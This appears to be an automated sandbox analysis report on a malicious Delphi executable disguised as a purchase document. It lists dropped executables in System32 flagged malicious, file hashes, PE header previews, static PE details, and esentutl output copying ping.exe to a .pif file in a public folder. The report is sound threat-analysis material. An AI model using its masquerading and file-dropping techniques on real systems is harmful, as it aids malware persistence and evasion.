                                                                                                                                                                                                                        SHA-256:616BBC2C07D1B4022B655007EE9FBAC46EC13E36A526BB406363381913206E61
                                                                                                                                                                                                                        SHA-512:F1AD8BB2F2215108CB5D6129928F2A424784B70649E8D9367151F535E351C5681CCE6EC13C12BC99393F96BDA0D8C1F4465D19B17BD81BFD2192982DE5985CF5
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.......................................... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\snmptrap.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1146880
                                                                                                                                                                                                                        Entropy (8bit):5.0275745281626385
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:G9KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cKsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:9E84CEFC497519C8483A6623FAD6ED3D
                                                                                                                                                                                                                        SHA1:D4E217AF8B73C7673BCC9F548E55E9B06044CFDD
                                                                                                                                                                                                                        SHA-256:BF24E76F12FDD69ED7550A5A632E31B882EA335B77E534A125C78336FF3CC4C7
                                                                                                                                                                                                                        SHA-512:20CEE389D607C89DCA6B90AF7134C818B5D2FC86E032B5B9B924CCF712BD4733324A69148257E8CB6BCD5CE49335F9D2EA9150E57952A90D756D44CE40BA1647
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.......................................... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\vds.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1303552
                                                                                                                                                                                                                        Entropy (8bit):7.17152935485563
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:6Z0FxT1UoYr99GdcpKDsqjnhMgeiCl7G0nehbGZpbD:awWcHDmg27RnWGj
                                                                                                                                                                                                                        MD5:680F459932662444F71FD678EBDF4171
                                                                                                                                                                                                                        SHA1:546B290480A2DE723EC37C1E220E1DE78BF5FE10
                                                                                                                                                                                                                        SHA-256:FD894DE64E1F3B095C2598DEB789B174CBE575B1C17E455C9EC70153C37B7B37
                                                                                                                                                                                                                        SHA-512:5145046CF1165B5573089BF3BBD6ECDAF977BF713BFD1DBB690A891226052C3B01FF33925A0E108766978CE452D45A582E0CD35A490755B3C0A0D13AB3A336B6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@.......W.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1339392
                                                                                                                                                                                                                        Entropy (8bit):5.269275998470314
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:PyoKo2fRple9pAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:PyocJApAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:F0B46EB736FF9F031B20DBC806736CBC
                                                                                                                                                                                                                        SHA1:87376D5AD65A70FC9855406402A04532D8E374E6
                                                                                                                                                                                                                        SHA-256:7A617F7A95DB13876451136FBEF82A5867610129FBB97F5E190835CED651AD2A
                                                                                                                                                                                                                        SHA-512:2B9D1F0867BCAD7363976C8FC1FA8D017D96E5D42165FF86B07171597A850AC940B2296B161C2B33FDE3537344412FE2D76B05F6E1FDE8C00FD2653D6099DD83
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@.....................................N.... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\wbengine.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2164736
                                                                                                                                                                                                                        Entropy (8bit):7.062018620364253
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:EWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKQDmg27RnWGj:u0zuNIcD527BWG
                                                                                                                                                                                                                        MD5:9BFD3EAD3D7CAB859F5ACBEE167740B3
                                                                                                                                                                                                                        SHA1:DEADA76D7E1BBA474CED79C65A97E96E4114D800
                                                                                                                                                                                                                        SHA-256:7C36F8947992FE5AF578F47654410485005EBF46D41CD1710BB867BEAF13CDF3
                                                                                                                                                                                                                        SHA-512:E839A05C68C8C919062F6174B1CF7FF999B32C6A913891792CE7AAE1F54A9965BD38ACA2219C4068AA5368112FB5D715C61A45A75892D12E924C00CC6E532CED
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!......Z!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                        Entropy (8bit):0.09980532201271851
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:svuSc63l/k/uMclF6vMclFq5zUbm1tNOn+SkUeYDwDzym0uScjj:svul6V/kqF69Fq5z9vO+pawHym0ulf
                                                                                                                                                                                                                        MD5:F597898498EEFC86B6B601492B4C8192
                                                                                                                                                                                                                        SHA1:96FB19E29F9D39B0ED2A64BCD1FC39E3F668912B
                                                                                                                                                                                                                        SHA-256:238ECDE4DF0A01293DA7472DEC3374EC3E1B6B4BD0B1D9B8C116AD27BCE12DDF
                                                                                                                                                                                                                        SHA-512:EBF5BC88520919DF4973C4DA71476CF088200BDD954AE22239FF471F793F62778DCF0018BCEF9D0137CC9CE9F38096B0B26E7BFC7587D3F36DA9FAE759CAE23F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:....`...`.......................................`...!......................................i....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................X.Pl............Q...J..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P............i....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                        Entropy (8bit):0.10132013151562051
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:Vl6RC3l/k/uMclF6vMclFq5zU7NEtNMu3n+SkUeYDwDzyMhrb:Vl6RCV/kqF69Fq5zSEvX+pawHysf
                                                                                                                                                                                                                        MD5:FBDE7D1C96E11A8DB86D01102845F32A
                                                                                                                                                                                                                        SHA1:C3FE52AFB49BEF79EDEA0ED8E754A73C529D8681
                                                                                                                                                                                                                        SHA-256:435E93E841E468B91E5820000C4D84B710B4233CB76230E02A24C2DBE2AFE43E
                                                                                                                                                                                                                        SHA-512:B24E0C90D913C5BF7F5A61C15D3C32EED011AF60BC9D940B34D3EC809F4702131A07921AAC6C171963A08A29C98C9D6F0DEDF62E77B7D0351003C973225ECBEE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:....h...h.......................................h...!......................................i....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................X.Pl................J..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P............i............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                        Entropy (8bit):0.09837574328458057
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:uV0JY3Nk/uMclF6vMclFq5zUR/tNIn+SkUeYDwDzy7JBr:uyJY9kqF69Fq5zK/vI+pawHy7Jl
                                                                                                                                                                                                                        MD5:56128C0E82F8FCED62D77713FA9F5BB3
                                                                                                                                                                                                                        SHA1:54F2ED41AB5BBE6829290962FB18EB09BFC7839C
                                                                                                                                                                                                                        SHA-256:4547A48C746412F69281732C1667266399E74C5D78CE0FE5DD66DDF82DDBC2E5
                                                                                                                                                                                                                        SHA-512:432F50A4DD4D49AC65A75BD476B6A21DF6059170CFDFD8018E632AC45F37CE7C2F85B65A05A7A8B27831E3AB32BBFA3B57F66AE3D1A850A205B8B7F02400FEA5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:....X...X.......................................X...!....................................?.i....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................X.Pl................J..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P..........?.i............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                        File Type:Microsoft HTML Help Project
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):869
                                                                                                                                                                                                                        Entropy (8bit):4.8858245776382505
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:pXGEx9BHMlTDQ49+EHM2dGiRzu2DIJOlk3R6:5j7WTDCERD
                                                                                                                                                                                                                        MD5:EE98BC909AC68E27D8BF76D2E745D6B2
                                                                                                                                                                                                                        SHA1:DB3127D8E708C27327FE56707242E0545CCA78B2
                                                                                                                                                                                                                        SHA-256:78EC75C0FD5795639581FA9A2CB4DF5E4D50EA3FE77DFF590EA0FF1D38610218
                                                                                                                                                                                                                        SHA-512:BA606FFDEE32EC50E52E5E42BBC9F3EE2E846CA31A3E950F05B7C31941071C258F7EB01412D73FC0605265C32416A57B1593E8AFA41A94D6C323D53F51B16858
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:..Usage Error: Invalid argument 'REQUIRED'. Options must be preceded by '-' or '/'.....Extensible Storage Engine Utilities for Microsoft(R) Windows(R)..Version 10.0..Copyright (C) Microsoft Corporation. All Rights Reserved.....DESCRIPTION: Database utilities for the Extensible Storage Engine for Microsoft(R) Windows(R).....MODES OF OPERATION:.. Defragmentation: /d <database name> [options].. Recovery: /r <logfile base name> [options].. Integrity: /g <database name> [options].. Checksum: /k <file name> [options].. Repair: /p <database name> [options].. File Dump: /m[mode-modifier] <filename>.. Copy File: /y <source file> [options]....<<<<< Press a key for more help >>>>>..D=Defragmentation, R=Recovery, G=inteGrity, K=checKsum,..P=rePair, M=file duMp, Y=copY file..=>

                                                                                                                                                                                                                        \Device\Null

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):561
                                                                                                                                                                                                                        Entropy (8bit):4.5384355284379145
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNt:/p4xT5cp7u0wQakB4aV4t8N2
                                                                                                                                                                                                                        MD5:7E4D38978C26AF4C0157FD5D3C46280A
                                                                                                                                                                                                                        SHA1:545DE154C384AC385669E28B9099DB7B9AC35B3A
                                                                                                                                                                                                                        SHA-256:3E66CA31F5323DBEFB46A604620A3EA38767E31382DE36A42C2C1C7A38D5C1A8
                                                                                                                                                                                                                        SHA-512:FFAE5B123BFA65B070F8DD2EFA5F9996C8D7A416CEF54005AD00CFD90D2518B6FEB49C3843C93B48D9E9B53775CE31EC087970F85E4B0974EC37D9D5A0DE57D6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Desusertion File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.157 seconds.....

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):6.9809492769682215
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 93.60%
                                                                                                                                                                                                                        • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.12%
                                                                                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                        File name:PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        File size:1'264'128 bytes
                                                                                                                                                                                                                        MD5:cbeea46a413d2f3d7166104d79788062
                                                                                                                                                                                                                        SHA1:6bca74ac8ef6b5a5377dbd0cac8ce783dda2b080
                                                                                                                                                                                                                        SHA256:5250d7820ffe465180b022c710bb170b02d1aeb8fbb4c530c5e039d4259009ef
                                                                                                                                                                                                                        SHA512:34d3cbbf686869bf5e0c69239f50ebe93d85feff13298afe14d6de6afae7112d3aa4ef64b14d7fe48768c740c635500d2180e709b57494f264853dafc5642b99
                                                                                                                                                                                                                        SSDEEP:24576:zPMPVEhH8frMNVO1wyWYVtcqqvHP7R3Eb1v7kcER8:zPUyOShq0HFA7zER8
                                                                                                                                                                                                                        TLSH:31459E36E3D2D531E39611340C3AE79C1429BE10DE94AC7ADBF938985F35EB0A62D172
                                                                                                                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:58fad8c9c7c1c143

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x487840
                                                                                                                                                                                                                        Entrypoint Section:.itext
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                        DLL Characteristics:
                                                                                                                                                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:527a63fb749f250b3291f735431fb926

                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        add esp, FFFFFFF0h
                                                                                                                                                                                                                        mov eax, 004867D8h
                                                                                                                                                                                                                        call 00007FF864C38C69h
                                                                                                                                                                                                                        mov eax, dword ptr [0051B2ECh]
                                                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                                                        call 00007FF864C940D1h
                                                                                                                                                                                                                        mov ecx, dword ptr [0051B200h]
                                                                                                                                                                                                                        mov eax, dword ptr [0051B2ECh]
                                                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                                                        mov edx, dword ptr [0048290Ch]
                                                                                                                                                                                                                        call 00007FF864C940D1h
                                                                                                                                                                                                                        mov eax, dword ptr [0051B2ECh]
                                                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                                                        call 00007FF864C94145h
                                                                                                                                                                                                                        call 00007FF864C36C00h
                                                                                                                                                                                                                        lea eax, dword ptr [eax+00h]
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1200000x2a1e.idata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x12e0000xf200.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x88c8.reloc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x1240000x18.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x1207cc0x68c.idata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000x85a200x85c0032914a4ae2038f195450841770cfb2b5False0.5154661945093458data6.527570967979339IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .itext0x870000x8880xa00ff65773b408a6dc6b42c471ec6f6063aFalse0.539453125data5.685670077449999IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0x880000x934980x93600c9befc6195b5e609db66a54f059536caFalse0.4011526585029686data6.496383668365439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .bss0x11c0000x37080x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .idata0x1200000x2a1e0x2c0087b19ddb7d0c017a45db353e65e9290dFalse0.30619673295454547MIPSEB-LE MIPS-III ECOFF executable stripped - version 0.185.068542061868325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .tls0x1230000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .rdata0x1240000x180x2002f07acfeab4d52fe1003c0710394a5a6False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "R"0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .reloc0x1250000x88c80x8a00762a2311f796f314f61681486f1d5d98False0.5990432518115942data6.657135448984252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rsrc0x12e0000xf2000xf2004ecb43381651e0db8543533c7e3680daFalse0.3708354855371901data6.181511046885612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_CURSOR0x12eb780x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                        RT_CURSOR0x12ecac0x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                        RT_CURSOR0x12ede00x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                        RT_CURSOR0x12ef140x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                        RT_CURSOR0x12f0480x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                        RT_CURSOR0x12f17c0x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                        RT_CURSOR0x12f2b00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                        RT_BITMAP0x12f3e40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                                                        RT_BITMAP0x12f5b40x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                                                                                                        RT_BITMAP0x12f7980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
